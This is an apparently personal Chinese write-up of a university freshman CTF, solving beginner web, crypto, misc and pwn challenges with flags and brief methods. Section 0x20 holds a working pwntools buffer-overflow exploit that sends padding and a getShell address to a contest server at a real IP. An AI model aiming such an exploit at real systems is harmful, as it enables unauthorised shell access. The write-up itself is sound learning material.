SDUST 新生赛 by.dayi

0X01

你知道网页的初始界面是什么吗?

用bp的repeter可以做,后来发现其实直接curl就行

[root@oao ~]# curl http://124.70.85.223/web3/index.php
Woodpeckerctf{faster_as_you_can}
[root@oao ~]#curl 

0x02 签到

扫码

0x03 百度

woodpecker{Baidu_!}

0x04 福利

flag{Shen_mE_p0_t1_Mu}

0x05 贝斯祝愿你能在大学里找到对象

base64直接解码

0x06 17900 Shimakaze

使用Stegsolve.jar点几下然后扫码

0x06 邀请你的好舍友过来拍张照吧!!!!

解压后拍照

0x07 你知道凯撒大帝的密码吗?

稍微有点意思

暴力解码凯撒https://paste.ubuntu.com/p/ddQXBc8Vjd/,然后

import base64

for i in range(1,30):
    try:
        str=input()
        print(base64.b64decode(str))
    except:
        print("wa")

0X08 PWN 1

这个题,用IDAPRO可以得到源代码

pwn1

0x09开冲!

看键盘找密码

0x10

zip,然后看属性,发现:用winhex

0x11Read python code Please

解密代码如下,反过来就行


ans=[]
resarry=[153, 78, 177, 67, 178, 68, 165, 74, 167, 81, 165, 83, 168, 90, 150, 71, 167, 62, 163, 65, 163, 75, 171, 83, 187, 62, 177, 69, 161, 66, 177, 67, 167, 62, 148, 68, 163, 35, 161, 32, 176, 67, 161, 47, 180, 78, 169, 81, 163, 76, 167, 62, 171, 82, 161, 72, 175, 79, 177, 81, 163, 77, 182, 62, 115, 45, 161, 34, 150, 37, 99, 92]
for i in range(len(resarry)):
    print(resarry[71-i])
    if i%2==0:
        ans.append(resarry[i]-66 +128)
    else:
        ans.append(resarry[i]+33 +128)

for i in range(len(ans)):
    print(chr(ans[i]%128),end="")
print(ans)

0x12新佛与党

新佛曰社会主义核心价值观两个解码组合,不是他们一血那么快我都不知道我方向部队,我还研究了半天的12位进制哈哈哈哈哈

0x13 ezyiiiiiii

油猴脚本是好东西web11

然后直接F12

0x14快来救救这个可怜的二维码吧!!!!

画图解决

misc1

0x15好矮油

是个原题,我承认我百度做的,用winhex然后把01改成11就行了

0x16有手就行

啊啊啊,这个是我瞎子题,先把\n替换,base64,社工hits,考虑生活方面,然后考虑是不是qq号

然后qq名

0x17跳动的音符

好题

https://gchq.github.io/CyberChef/#recipe=XOR(%7B'option':'Hex','string':''%7D,'Standard',false/disabled)XOR_Brute_Force(1,100,0,'Standard',false,true,false,'')&input=dGxsZ3NmYGhmcXgxMzEyXHp6Z3AiIn4

打开这个网页就行

0x18 要happy啊!

社工,看wifi名,有ele.me的图,然后从支付宝找那个wifi名开头的店

0x19 [$1+$2+$3=flag](http://124.70.85.223:8000/challenges#$1+$2+$3=flag)

好烦,截图找不到了,重做

第一步,用连点器结果发现点到60还是不知道是啥,然后还是进了no_flag.php

打开F12看source,发现时间那里有个颜文字加密的js

解密吼

11}]V2U})9]

然后进入flag.php

发现字符串拼接

然后在第一步看源代码,发现第一步有注释的php得到part1

1111

然后第二部切换到.network

(第二部源代码提示过要看head)

拼手速11212

得到part2

拼接后得到flag

0x20 PWN3

根据大佬给的WP,然后直接运行

from pwn import *
context.log_level = 'DEBUG'
context.terminal = ['terminator', '-x' ,'sh' , '-c']
p = remote("43.128.1.238",10001)
elf = ELF("pwn")
#libc = ELF('')
offset = 72
address = elf.symbols['getShell']

p.recv()
payload = 'A' * offset + p64(address).decode('unicode_escape')
p.send(payload)
p.interactive()

pwn3QQ截图20210921154450

0x21Just ook my dear bro

ook解码

0x22 套娃

套娃很严重

将jpg改为zip

然后解压

然后得到2.jpg

用oursec,密码123456可以得到flag.txt

VjJVeFl6QnRaVjlVTUY5WE1EQkVVRVZEUzJWeQ==
base64得到
V2UxYzBtZV9UMF9XMDBEUEVDS2Vy
然后加密大厨可以得到
https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false,'')&input=VjJVeFl6QnRaVjlVTUY5WE1EQkVVRVZEUzJWeQ
嗯就这样

QQ截图20210922182112

0x23安妮....我的安妮 :-} 嘿嘿嘿

呃,竟然不是word隐写,我方向错了好多次。

后来发现福尔摩斯其实可以允许.==E

于是,福尔摩斯,可以得到一串字母

这个我还找到了您的csdn博客呢!

就这样啦

感受

这次比赛,其实最大的感受就是每次打算学pwn,然后又来题,又要冲前几,特别特别累,还要做别的事情唉。不过还是很开心滴!

谢谢各位大佬出题!

如果有细节不够,欢迎叫我补充!!

最后修改:2021 年 09 月 22 日
如果觉得我的文章对你有用,请随意赞赏